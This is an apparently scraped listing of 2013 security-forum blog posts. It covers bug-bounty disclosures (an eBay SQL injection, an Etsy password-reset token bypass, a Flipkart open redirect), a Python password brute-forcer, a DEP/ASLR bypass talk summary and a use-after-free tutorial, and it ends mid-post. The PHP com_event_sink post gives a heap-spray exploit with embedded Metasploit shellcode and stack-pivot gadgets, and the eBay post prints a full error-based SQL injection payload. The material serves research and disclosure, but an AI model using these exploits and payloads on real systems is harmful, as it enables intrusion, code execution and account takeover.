Garage4hackers Forum - Blogs

Basic Idea of Creating Password Bruteforce tool

krokite — Sun, 09 Jun 2013 19:58:41 GMT

Includes 2 Basic Program :-
Basic "C++" program.

BruteForce Script in Python.

Here is Sample Code of CPP Program, that will need Password :-

Save Below Code with blackbuntu.cpp name

PHP Code:

/* Author: KroKite Description: Basic Bruteforcing Tools URI: http://www.fb.me/r0ckysharma */ #include #include #include using namespace std; // When passing char arrays as parameters they must be pointers int main(int argc, char** argv) { if (argc < 4) { // Check the value of argc. If not enough parameters than, inform user and exit. cout << "Usage is -f -p password\n"; exit(0); } else { // if we got enough parameters.. int i=1; while(i<=argc) { if (strcmp(argv[i],"-f") == 0) { cout << "File to Open: " << argv[i + 1] << endl; } if (strcmp(argv[i],"-p") == 0) { cout <<"Password is : " << argv[i + 1] << endl; if(strcmp(argv[i+1], "KroKite") == 0) { cout << "File Opening SuccessFul"<< endl; } else { cout << "Wrong Password"<< endl; } } i++; } } return 0; }

Compile above program with g++
Code:
root@blackbuntu# g++ blackbuntu.cpp -o blackbuntu
and now run program to understand what it will do,
Code:
root@blackbuntu# ./blackbuntu 
Usage is -f  -p password
So, Run with Arguments, and it takes password with '-p' arguments :-

Giving Wrong Password as "blackbuntu"
Code:
root@blackbuntu# ./blackbuntu -f blackbuntu.txt -p blackbuntu
File to Open:  blackbuntu.txt
Password is : blackbuntu
Wrong Password
Now Running with Correct Password :-
Code:
root@blackbuntu# ./blackbuntu -f blackbuntu.txt -p KroKite
File to Open:  blackbuntu.txt
Password is : KroKite
File Opening SuccessFul
But, Now what if you don't know the password of program, and you need to open it, how would you do that, here is basic python code that will help you do that :-

Save below file with name "bruteforce.py"

PHP Code:

#!/usr/bin/python # Author : KroKite # Description: Basic Password Bruteforcing Tool # URL: http://www.fb.me/r0ckysharma import subprocess import re fo = open("password.txt", 'r'); for lines in fo: password = lines.split('\n') brute = subprocess.Popen(["./blackbuntu", "-f", "foo.txt", "-p", password[0]], stdout=subprocess.PIPE) if(re.search("Success", brute.communicate()[0])): print "Password Cracked and your Password is ", password[0] exit() else: print password[0], " is not Password"

Now make another file which has list of password, Write 1 password in 1 line.

password.txt file :-
Code:
abcdef
123456
hacker
bullshit
wtf
blackbuntu
facebook
twitter
metallica
KroKite
shit
password
pass
And now Run your python program :-
Code:
root@blackbuntu# python bruteforce.py 
abcdef  is not Password
123456  is not Password
hacker  is not Password
bullshit  is not Password
wtf  is not Password
blackbuntu  is not Password
facebook  is not Password
twitter  is not Password
metallica  is not Password
Password Cracked and your Password is  KroKite
Note: Please Remember this is just basic idea and does not account exactly to your program, you might have to do more homework for your application with above bruteforce.py tool. With Few Changes above bruteforce.py tool may work with mysql [not tested]

bruteforce.py file reads 1 password at a time and than run your program with fetched password and checks the success of password, if it does, than it simply prints password and exit, so the very last line will be your password if it has successfully cracked it.

Also , all above Code is completely written by me, if you share it or modify it further, do include my credit. Thanks

Got Question ? Ask them below, and i believe this simple demo will clear doubts.

DEP ASLR bypass without ROP JIT : CanSecWest2013 Slides and Analysis

fb1h2s — Fri, 08 Mar 2013 00:33:07 GMT

I have my own talk from CanSecwest to blog about but this one is more interesting and the most awaited one. So here are the slides, I will add my own analysis and test cases to this blog entry later. Interesting thing is we had this technique discussed on garage in november http://www.garage4hackers.com/f22/wi...innu-3080.html .

Yu Yang @tombkeeper did a demo of the technique on Ms013-08 and it does not ever need a heap spray for his ASLR/DEP bypass technique .

And the exploit is scary, its a quick kaboom with out heap spray.
He calls this method GIFT [ Got it form a table] .
The simple technique is to change the VFT of wow64sharedinformation and it's ptr.

Here are couple of quick notes on the bypass Technique :

Good news about the Technique:.

Totally ASLR/DEP free

Language/SP independent

Work on almost all use-after-free/vtable-overflow

Target on IE, firefox, pdf reader, flash, office �

Even don�t need shellcode

Sometimes don�t need heapspray

Need a Windows file sharing server

It is not a real problem

Only work on 32-bit process in x64 Windows

This situation is very common

Can not work on Windows 8

The documents and presentation is from Yu Yang @tombkeeper
Download Slides from here:
https://docs.google.com/file/d/0B46U...it?usp=sharing

Cheers.

SQL Injection Vulnerability in ebay

Inxroot — Fri, 25 Jan 2013 19:36:33 GMT

Title: SQL Injection Vulnerability in eBay.com sub domains
Author: Yogesh D Jaygadkar
Reported: December 27, 2012
Fixed: Jan 15, 2013
Public Released: Jan 25, 2013
Thanks To: Darshit Ashara
Greets : Rahul Bro, Aasim, Sandeep, Sagar

Description:

Last Month I reported SQL Injection vulnerabilities in eBay.com sub domains. You can see how many days they took for patching & allowing me to publish the vulnerability. But finally they fixed it & listed me in their Researchers Acknowledgement Page.Like every other bounty hunter I was also searching for some vulnerability in EBAY.That time I have no idea that Ebay don�t give bounty for any vulnerability. Not even for SQL Injection. :)

POC:

Sub Domains: sea.ebay.com & export.ebay.co.th

Page:
sea.ebay.com/searchAnnoucement.php
export.ebay.co.th/searchAnnoucement.php

Vulnerable Parameter: �checkbox� Array POST parameter.

Search option in above pages provides a �Select Site� checkboxes which filters the search result by different countries.

HTTP Headers:

Host: sea.ebay.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://sea.ebay.com/searchAnnoucemen...ime=Jan%202012
Cookie: Cookie Value
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

POST Contents: checkbox%5B%5D=(select+1+and+row(1%2c1)>(select+co unt(*)%2cconcat(CONCAT(CHAR(68)%2C(SELECT+USER())% 2CCHAR(65)%2CCHAR(86)%2CCHAR(73)%2CCHAR(68))%2c0x3 a%2cfloor(rand()*2))x+from+(select+1+union+select+ 2)a+group+by+x+limit+1))&

So this is all for submitting report. After that I simply used sqlmap the gr8 :)

Reliable PHP Exploitation from Windows XP to Windows 7

Rashid bhatt — Fri, 11 Jan 2013 14:41:08 GMT

Theexploit code for PHP <= 5.4.3 (com_event_sink) Code Execution 82307: PHP com_event_sink Function Overflow DoS was published by Rahul Saasi some time before on this forum and both ofus had a nice discussion about the vulnerability and possible attack vectors.

Itried to dig deeper into the issue because exploiting this vulnerability with 100% reliability was quite challenging. In fact the exploit provided by both of us (rahul and me ) earlier, is not reliable at all because of the following reasons.

1:The shellcode buffer and the place from where EAX is fetched depends HIGHLY upon pre-determined memory location from the heap region A single change(even a white space) in the source code of the exploit will result in change in memory location of our shellcode buffer.

2:It may work if the exploit code is the lone script executing on the victim machine, but again memory offset will definitely change from OS to OS and service pack to service pack. so if you are able to inject the php exploit through an RFI(remote file inclusion) web vulnerability to attack the server the exploit is most likely not going to work.

Thesecond part of this vulnerability is the main challenge and gives a false impression of ASLR even on the systems not running under such aprotection.

Now, i have figured out two ways to reliably exploit on different OS'es.These methods can be used to bypass DEP and ASLR (separately) with 100% accuracy across different platforms.

What�s wrong with the previous exploits?

The previous exploits seemed to be working when the above given constraints are not present i.e under a single system and it was the only script running, with no change in the source code of the exploit.

This will give you an insight of the problems arising with the exploit code.

Lets consider the following code to trigger the vulnerability

$buffer= str_repeat("a", 100); << edi

$vVar= new VARIANT(0x04040404);
$vVar2= new VARIANT("hello");

com_event_sink($vVar,$vVar2, $buffer);

?>

In this case the register output will be

EAX 00000000
ECX 00362940
EDX 0110D598
EBX 00000000
ESP 00C1F9F8
EBP 00C1FA4C
ESI 04040404
EDI0110D608 ASCII <<< edi"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa "
EIP102F59BD php5ts.102F59BD

Fine, so EDI happens to hold our buffer at the location 0x0110D608

NOTE:Please don�t be confused with the ASCII representation of our buffer . Basically in ZEND Engine the php strings are stored in unicode(2 bytes) form because we are passing the string to com_event_sink function , its later on converted to ASCII representation using zend_parse_parameter() ZEND API function.

As done in source code of com_com.c

File:com_com.c fucntion:com_event_sink()

>> parameter parsed
if(FAILURE == zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC,"Oo|z/",
&object, php_com_variant_class_entry,&sinkobject, &sink)){
RETURN_FALSE;
}

php_com_initialize(TSRMLS_C);
obj= CDNO_FETCH(object);

if (sink && Z_TYPE_P(sink) ==IS_ARRAY) {
/* 0 => typelibname, 1 => dispname */
zval**tmp;

if (zend_hash_index_find(Z_ARRVAL_P(sink), 0,(void**)&tmp) == SUCCESS)
typelibname =Z_STRVAL_PP(tmp);
if (zend_hash_index_find(Z_ARRVAL_P(sink), 1,(void**)&tmp) == SUCCESS)
dispname = Z_STRVAL_PP(tmp);
}else if (sink != NULL) {
convert_to_string(sink);
dispname= Z_STRVAL_P(sink); //convert to string representation
}

Now,because the values are stored somewhere in the heap and unfortunately that region of heap also happens to hold the information regarding the parse table of PHP source code in close boundaries. Now even a single change in the source code of the exploit will result in the change of address location of our buffer (EDI in this case) in the heap region. To show that, i will add a single comment line in the exploit source code and then we will examine the difference between the previous and the next memory location.

//Hello this is a comment
$buffer= str_repeat("a", 100); << edi

$vVar= new VARIANT(0x04040404);
$vVar2= new VARIANT("hello");

com_event_sink($vVar,$vVar2, $buffer);

?>

EAX 00000000
ECX 00362940
EDX 0110D538
EBX 00000000
ESP 00C1F9F8
EBP 00C1FA4C
ESI 04040404
EDI 0110D5A8 ASCII"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa "
EIP 102F59BD php5ts.102F59BD

Now its clearly seen below that there is a huge difference between the memory location of our buffer that comes after we make a slight change in the source code. Wonder how much will be the difference when there a large amount of code added ?

EDI� 0110D608
EDI� 0110D5A8

That brings out large unpredictability if the vulnerability is exploited in such a way.

Exploiting with Browser fashioned Heap spraying(Bypass ASLR).

As we have already seen the unpredictability if offsets are hard-coded ,we can use browser styled heap spraying for precision.

We will spray the heap enough to reach to the memory location 0x04040404 and also we will use this address as our jump location with spray value as 0x04 itself.

$buffer= str_repeat("\x04\x04", 27108862).
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31".// Metasploit calc.exe shellcode
"\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52".
"\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff".
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1".
"\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52".
"\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85".
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b".
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b".
"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d".
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b".
"\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3".
"\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b".
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b".
"\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b".
"\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00".
"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5".
"\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d".
"\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75".
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff".
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";

$vVar= new VARIANT(0x04040404);
$vVar2= new VARIANT("hello");

com_event_sink($vVar,$vVar2, NULL);
?>

Now when the jump takes place somewhere near 0x04040404 , machine will encounter 0x04 bytes which disassemble to addal,4 which basically is a NOP code.

Following is the basic idea behind the heap spray

MOVEAX,DWORD PTR DS:[ESI] << EAX == 0x04040404
CALLDWORD PTR DS:[EAX+10] << JMP 0x04040404 because [eax + 10] =0x04040404

Note:Because i tested the exploit using a Virtual machine which has limited memory capacity of 512MB, you may have to choose different spray addresses on machine with higher memory range
The following memory addresses can be used as spray as they also behave as NOP 's

0x05050505 = ADD EAX,5050505 <<< acts as a NOP

0x0c0c0c0c = OR AL, 0C << also acts as a NOP

0x0d0d0d0d = OR EAX,0d0d0d0d....

Knocking Stack variables for Precision( Bypass DEP fast no need to spray).

As, we have already seen that static offsets in the heap region of the php interpreter are quite unreliable to use. Now in order to be precise in offsets , we can use stack memory region for that we need a way to populate the stack memory region . At the same time we know that there is no way by which ,we can populate stack using php variables because they are stored in heap rather than on stack.

While checking out the ZEND Engine source code i figured out a way to populate stack region

PHP modules uses zend_parse_parameters()API function to get the variables passed to a php fucntion in C Styled declaration.

Somemodule store the variables in heap and some declare them as local

for example if you read the sourcecode of php_ftp.c from ftp module ofphp

/*{{{ proto resource ftp_connect(string host [, int port [, inttimeout]])
Opens a FTP stream*/
PHP_FUNCTION(ftp_connect)
{
ftpbuf_t *ftp;
char *host;
int host_len;
long port = 0;
long timeout_sec = FTP_DEFAULT_TIMEOUT;

if(zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|ll",&host, &host_len, &port, &timeout_sec) == FAILURE){
return;
}

you can see that many variable like host_len, port and timeout are stored on the stack , we can use this function to populate the stack memory.

This subroutine happens to be present at 0x10300B79 inside php5ts.dll

hereis the disassembly

10300B79 55 PUSH EBP
10300B7A 8BEC MOV EBP,ESP
10300B7C 83EC 10 SUB ESP,10
10300B7F 56 PUSH ESI
10300B80 8B75 1C MOV ESI,DWORD PTR SS:[EBP+1C]
10300B83 57 PUSH EDI
10300B84 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
10300B87 50 PUSH EAX
10300B88 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8]
10300B8B 50 PUSH EAX
10300B8C 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10]
10300B8F 50 PUSH EAX
10300B90 8D45 F4 LEA EAX,DWORD PTR SS:[EBP-C]
10300B93 50 PUSH EAX
10300B94 68 B8A95410 PUSH php5ts.1054A9B8 ; ASCII "s|ll"
10300B99 56 PUSH ESI
10300B9A FF75 08 PUSH DWORD PTR SS:[EBP+8]
10300B9D 33FF XOR EDI,EDI
10300B9F 897D F8 MOV DWORD PTR SS:[EBP-8],EDI
10300BA2 C745 FC 5A000000 MOV DWORD PTR SS:[EBP-4],5A
10300BA9 E8 B21CD4FF CALL php5ts.zend_parse_parameters
10300BAE 83C4 1C ADD ESP,1C

Now in this case we will try to use the port to populate stack region at 0x00C1FA88
and as we know that the vulnerability triggers by the following assembly sequence

MOVEAX,DWORD PTR DS:[ESI] << ESI = 0x00C1FA88- 10
CALLDWORD PTR DS:[EAX+10] << xchg esp,edi

Wewill use a stack pivoting gadget to make ESP point to EDI ( whichhold our ROP payload )

php5ts.dll is quite dense and luckily a lot of gadgets related to stack pivoting are found there

we will use the gadget found in php5ts.dll at 0x10005767 XCHG ESP, EDI,

Set the value of timeout variable to �0x00C1FA88 � 10� , and laterwhen the call [eax +10] takes place it will land to 0x10005767XCHG ESP, EDI Gadget.

Videos: In the following videos i am running the same exploit on windows XP(no SP), XP sp2, and windows 7. The video is to demonstrates the reliability of the techniques used.

Note:Because the PHP binary has been compiled with /NXCOMPACT MSVC compiler flag, which basically enforces the loader to use DEP for the binary , If you are testing with heap spraying please disable DEP before proceeding .

Windows 7

Windows XP SP2

Windows XP (NOSP)

Password Reset Vulnerability in etsy.com

Inxroot — Tue, 08 Jan 2013 13:06:19 GMT

Hi Friends & All Big Bros

Yesterday i received my first white hat bounty from etsy.com for finding password related vulnerability.

In etsy.com, when users reset their password, they receives password reset link which is as below.

h##ps://www.etsy.com/confirm.php?email=[User Email ID]&code=[Token code]&action=reset_password&utm_source=account&utm_medi um=trans_email&utm_campaign=forgot_password_1

I noticed that token is not getting validated from server side. So I removed it & tested with my own id.

Final POC:

h##ps://www.etsy.com/confirm.php?email=[victim user's email ID]&action=reset_password&utm_source=account&utm_medi um=trans_email&utm_campaign=forgot_password_1

And Password changed successfully.

Finally I am listed in ETSY Thanks Page. & rewarded with $1500 bounty & T-shirt
Thanks to etsy security team for quick reply.

Thanks to my friends : Darshit, sandeep, rahul bro, aasim , sagar & G4H :)

Hacking and Securing iOS Applications - Clubhack 2012 [ppt & Demos]

satishb3 — Wed, 05 Dec 2012 01:22:45 GMT

Abstract:
iOS applications share common set of classes and highly depends on the operating system solutions for data communication, storage and encryption. Solely depending on the Apple implementation made them less complex but it affects security of the applications. Though iOS comes with a great set of security features like code signing, ASLR, DEP, sand boxing and Data Protection, all of them are subject to attack. Relying only on the iOS security could lead to demise the sensitive data stored within the application when the iOS is compromised. Application security can be improved by understanding the weaknesses in the current implementation and incorporating own code that work better.

Complete presentation and demo videos are available at -Clubhack 2012: Hacking and Securing iOS applications

Open-Redirect Vulnerability in Flipkart by SecurityPrimes

vigneshkumarmr — Tue, 20 Nov 2012 06:27:36 GMT

What is Open-Redirect Vulnerability?

An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it.

For more info , visit : https://www.owasp.org/index.php/Open_redirect

Ok. Now to the issue, we came across a link from FlipKart which is :

http://www.flipkart.com/ol?link=http...g.flipkart.com

where the parameter actually meant to redirect the users to FlipKart's Blog (blog.flipkart.com). So we tried replacing the parameter with FAKE LANDSCAPES - the artificial plant company which then becomes:

www.flipkart.com/ol?link=http://fake.com

But Flipkart prevented the attack by taking the victim correctly to Online Shopping India - Buy Books, Mobile Phones, Digital Cameras, Laptops, Watches & Other Products @ FlipKart. Epic fail.!!

Wait!! It's not over. We continued with changing the parameters. This time, we threw some thing that looked meaningful. Now the parameter is http://fakeflipkart.com which then becomes:

www.flipkart.com/ol?link=http://fakeflipkart.com

Whoolaa.!! Bypassed the system.!! It was because of generic regular expression match functioned by Flipkart. The victim is so redirected to http://fakeflipkart.com (Note: At the time of writing this, there was no such domain registered with that domain name. It's totally for a POC).

So in real attack, the attacker could host a fake Flipkart login page(Phishing) in his own domain and could steal user credentials.

The Team Security Primes reported this issue to Flipkart on November 19, 2012 and the fix was up the very same day.

Thanks to SecurityPrimes.

Beginners Guide to "Use after free Exploits #IE 6 0-day #Exploit Development"

fb1h2s — Thu, 15 Nov 2012 00:39:57 GMT

Yea right!

Last week a friend asked few queries regarding use after free vulnerabilities, . It's been a while I wrote a tutorial so taught of cooking a beginners guide this week end. I wanted a live target for the tutorial so my plans were to run my fuzzer on an old version of IE 6, since it is easy to find a bug in and it's not worth to blog out any new versions 0-day ;) . Any way I picked up the first test case IE crashed on and did some analysis to add it up to this tutorial.I din't spent much time with the crash since it's pointless to digg deep

So this blog post I will explain in detail the following.

1)The OS Heap and memory allocations.
2)Use after free issues and example buggy codes.
3) Analysis of a IE 6 crash, Use after free issue.
4) Exploiting Use after free bugs.
*Stay tuned for som Win8 IE10 stuffs ;

The Basics of OS Memory Management :

Memory used by program is divided into four,

The code area aka text segment [compiled program in memory ].

The globals [global variables are stored] .

Initialized Data Segment
Uninitialized Data Segment.
The heap, dynamically allocated variables.

The stack, parameters and local variables .

*Above image has mapped the lower and higher memory wrong.
Code Area:
This is the region in a virtual adress space that holds the executing instructions.It is is assigned memory below the stack and heap, to prevent an overflow overwriting the code.

The Globals:

Initialized Data segment [DS].

This region holds the global and static variables that are initialized by the programmer.

For example:

Code:

int a = 0; char * fb ="fb1h2s";

The string is stored in the initialized read only area.

Uninitialized Data segment [BSS].

For example:

Code:

int a int b ;

This would be in the BSS segment

Stack:

Stack is a [Last in First out] data structure , so it's basically used for local storages and function calls etc.It has got it's own registers and instructions sets. So it even hold the raw byte of instruction executed by the program. This is one of the reason why stack based vulnerabilities are easy to exploit.

Stack allocations are done when variables are stored directly to memory .

For example:

PHP Code:

void f() {     if(true) {         int b = 0;     }     b = 1; }

Here value of "b" is already declared and know so "int b" is allocated on the stack.
*b is not available outside the if { } block, so the above program would have compilation issues.

Heap :
So considering the above if we need to handle memmory dynamically ,thats where Heap comes into picture. Heap overtakes the disability of stack, it's is the segment where dynamic memory allocation usually takes place.
Unlike stack memmory allocations[LIFO] the term "heap memory allocations" is unrelated to heap data structure. It's basically a linked list of used and free blocks. When a request for memory is made by functions like (new,malloc,GlobalAlloc,LocalAlloc, malloc,HeapAlloc,RtlAllocateHeap etc) they are satisﬁed by providing a suitable block from one of the free blocks. This requires updating list of blocks on the heap [Heap Management ]. This meta information about the blocks on the heap is also stored on the heap often in a small area just in front of every block .The various OS implementation of heap management functions make use of these meta info when allocating and freeing heap. And the many heap based exploits out there make use of these heap management structures to achieve code execution by feeding them with malformed data.
Note: Heap overflow and [Dangling pointer, Use after free bugs] are two diff things.

Bulletins:

� The heap size is predefined at application startup but can grow as per required.

� You would use the heap if you don�t know exactly how much data you will need at runtime or if you need to allocate a lot of data.

� Responsible for memory leak, you need to free the unused memory manually.

� You need to manually free memory onces it is no more in use and that should never fall out of scope. The data is freed with GlobalFree , LocalFree, delete[] free etc functions .

� Can have allocation failures if too big of a buﬀer is requested to be allocated.

� All shared libraries and dynamically loaded modules in a process could access the heap. This same reason why you can do heap spraying on a browser using any loaded modules example: flash,java script ,vbs etc.

memory management - What and where are the stack and heap? - Stack Overflow

Example Program Demonstrating memory allocations.

PHP Code:

int *x; /* Uninitialized variable stored in bss*/ int w; /* Uninitialized variable stored in bss*/ int y =10 ; /* Initialized variable stored in DSS*/ void b() {     if(1==1)     {         x = malloc(sizeof(int)); /* Memmory allocated in Heap */         /*memory not freed */     }    } void c() {     free(x); /* Memory Freed */ } int main(void) {        static int f =10  ; /* Initialized static variable stored in DS */     static int i; /* Uninitialized static variable stored in bss */     b();     c();     return 0; }

http://www.geeksforgeeks.org/archives/14268

In short large variables of arrays whose size may vary, heap memory allocation is used. So heap related security issues occur when
1) Not freeing all of the memory allocated ending up with memory leaks.
2)Using of already released memory would lead to Use after free security issues.
3) Double freeing memory would cause memory corruptions .

Use after free issues and example buggy codes.
[I]#dangling pointers #use after free #double free

Example Buggy program:

Code:

int main(void) { char *ch_ptr = malloc(100); int i; for (i = 0; i < 99; i++) { ch_ptr = 'A'; free(ch_ptr); printf("%s\n", ch_ptr); } }

Here at line 3 char_ptr is allocated a 100 bytes heap and later inside the for loop at line 8 the heap is deallocated. And at line 9 the de referenced pointer is called again. So this will trigger a memory corruption as follows.

So the exploitation goes based on the nature of the crash, we will dig into the exploitation methods later.

A Live example:

For demonstration a good and easy to understand bug would be the CVE-2009-1379 OpenSSL from 0.9.8 to 0.9.8k use after free bug.

The buggy code:

https://bugzilla.redhat.com/attachme...71&action=diff
The Bug:

al is initilized at line 424 to &frag->msg_header and at line 533 it's freed using dtls1_hm_fragment_free(frag); and at line 536 if the following condition satisfies "(if al=0)" then program will try to access "frag" line 539 which was freed at line 533. So this will cause an invalid read operation , possibly crashing the app, and if we are some how able to control the adress that its reading form [heap spray!! or what ever], then we would be able to achieve code execution.

The Fix:
The simple fix to this was to add a temporary variable at line 533 "frag_len = frag->msg_header.frag_len;" holding frag->msg_header.frag_len. And later return frag_len instead of the freed object.

Fuzzing for Use After Free and Fuzzers

*We will have another blog post for this some time later.

Exploiting Use after free bugs.

C++ Virtual Functions :

C++ matches a correct function call based on the type of the object at runtime. This is called dynamic binding and this is done by using the keyword "virtual". The virtual keyword instructs the compiler that it should choose the right function based on the object it's reference referred to rather than the type. These objects that are referred by virtual functions points to a virtual table VFTABLE[Virtual Function Table] . It's where all the virtual functions adress are stored. It would be the first DWORD in the object memory.

Image Source:http://www.blackhat.com/presentation...07-afek-WP.pdf

Example Program:

PHP Code:

#include using namespace std; class Test {     public :         virtual void Show()         {             cout<<"I am in Test Class"<<endl;         } }; class Test1 : public Test {       public:            virtual void Show()            {             cout<<"I am in Test1 Class"<<endl;            } }; int main() {     Test *Obj;     Test Obj1;   // Base Class Object     Test1 Obj2;  //Derived Class Object     Obj = &Obj2;     Obj->Show();  //In this case derived class show function called.     Obj = &Obj1;     Obj->Show(); //In this case Base class show function called. } [B]And the output is :[/B] [CODE]I am in Test1 Class I am in Test Class[/CODE]

Virtual Functions in C++
IBM Linux Compilers

The above program will have the following vftable structure.

Code:

Class Test size(8): +--- |{vfptr} +--- Test's Vftable: +-- | {vfptr} | &test::Show Class Test1 size(8): +--- |{vfptr} +--- Test1's Vftable: +-- | {vfptr} | &test1::Show

Code:

004013D0 |. 8D45 C8 LEA EAX,DWORD PTR SS:[EBP-38] 004013D3 |. 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX 004013D6 |. 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 004013D9 |. 8B10 MOV EDX,DWORD PTR DS:[EAX] 004013DB |. 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 004013DE |. 890424 MOV DWORD PTR SS:[ESP],EAX 004013E1 |. 8B02 MOV EAX,DWORD PTR DS:[EDX] 004013E3 |. FFD0 CALL EAX Here EAX point to the Virtual Function table which point to calls the "Test1" 004013E5 |. C70424 0000440>MOV DWORD PTR SS:[ESP],vfunc.00440000 ; |ASCII "pause" 004013EC |. E8 AFF20000 CALL ; \system 004013F1 |. 8D45 D8 LEA EAX,DWORD PTR SS:[EBP-28] 004013F4 |. 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX 004013F7 |. 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 004013FA |. 8B10 MOV EDX,DWORD PTR DS:[EAX] 004013FC |. 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 004013FF |. 890424 MOV DWORD PTR SS:[ESP],EAX 00401402 |. 8B02 MOV EAX,DWORD PTR DS:[EDX] 00401404 |. FFD0 CALL EAX Here EAX point to the Virtual Function table and calls the "Test" class 00401406 |. C70424 0000440>MOV DWORD PTR SS:[ESP],vfunc.00440000 ; |ASCII "pause" 0040140D |. E8 8EF20000 CALL ; \system 00401412 |. B8 00000000 MOV EAX,0 00401417 |. C9 LEAVE 00401418 \. C3 RETN

Lets put a break point on Call and analyze where EAX point to:

Code:

0:000> t eax=00410a5c ebx=00004000 ecx=0040cc50 edx=00441c84 esi=00def786 edi=00def6f2 eip=004013e3 esp=0022ff10 ebp=0022ff78 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 image00400000+0x13e3: 004013e3 ffd0 call eax {image00400000+0x10a5c (00410a5c)} 0:000> u 00410a5c image00400000+0x10a5c: 00410a5c 55 push ebp 00410a5d 89e5 mov ebp,esp 00410a5f 83ec08 sub esp,8 00410a62 c744240419004400 mov dword ptr [esp+4],offset image00400000+0x40019 (00440019) 00410a6a c70424c0334400 mov dword ptr [esp],offset image00400000+0x433c0 (004433c0) 00410a71 e8a6b60200 call image00400000+0x3c11c (0043c11c) 00410a76 c7442404ecae4300 mov dword ptr [esp+4],offset image00400000+0x3aeec (0043aeec) 00410a7e 890424 mov dword ptr [esp],eax

Now that we are clear how VFtable works the exploitation of Use-after free could be done a couple of ways.The basic way of doing it would be.
De allocate an object having a VFT entry

Controlling the Vftable and pointing it to out own [shellcode]code.

So now when a Virtual Function call takes place it point to our injected code.

Use After Free Exploitation [IE 6 0-day].

HTML Code:

"http://www.w3.org/1999/xhtml" > "text/html; charset=utf-8"/> "1"> </span>FB1H2S Browser Test , soemthing weired here<span style="color:#000080"> "sass.css" rel="stylesheet" type="text/css"/>
"float:left; width:770px; margin-left:8px;">
"fb1h2s_fb1h2s">

"fb1h2s_fb1h2s_fb1h2s">
"fb1h2s_fb1h2s_fb1h4s" > IE WTF

"aboutproduct">FB1H2s : FB!H2S : THE Garage 4 Hackers : Bla Bla Bla

"fb1h2s_fb1h2s_fb1h3s">

sass.css .fb1h2s_fb1h2s, .fb1h2s_fb1h2s_fb1h2s{background-color:#fff;width:564px;float:left;height:auto;marg *in:5px 0 5px 9px} .fb1h2s_fb1h2s_fb1h3s{float:left;width:164px;margi *n-left:5px} .fb1h2s_fb1h2s_fb1h4s{width:551px;height:34px;back *ground-repeat:no-repeat;font-size:13px;font-weight:700;font-family:arial;margin-left:10px;float:left;padding:7px 0 0 10px} .aboutproduct{width:530px;height:auto;text-align:justify;line-height:18px;float:left;font-family:arial;color:#333;margin-bottom:10px;padding:0 5px 5px 13px}

The program crashes on IE 6 with the following exception.

Code:

(914.8fc): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=04cb4740 ebx=00000000 ecx=04cb4740 edx=04b80bfc esi=04cd8b40 edi=00080000 eip=7d51f463 esp=0013e5a4 ebp=0013e5f0 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 mshtml!CDispNode::GetRootNode+0x6: 7d51f463 8b4808 mov ecx,dword ptr [eax+8] ds:0023:04cb4748=????????

The Backtrace.

Code:

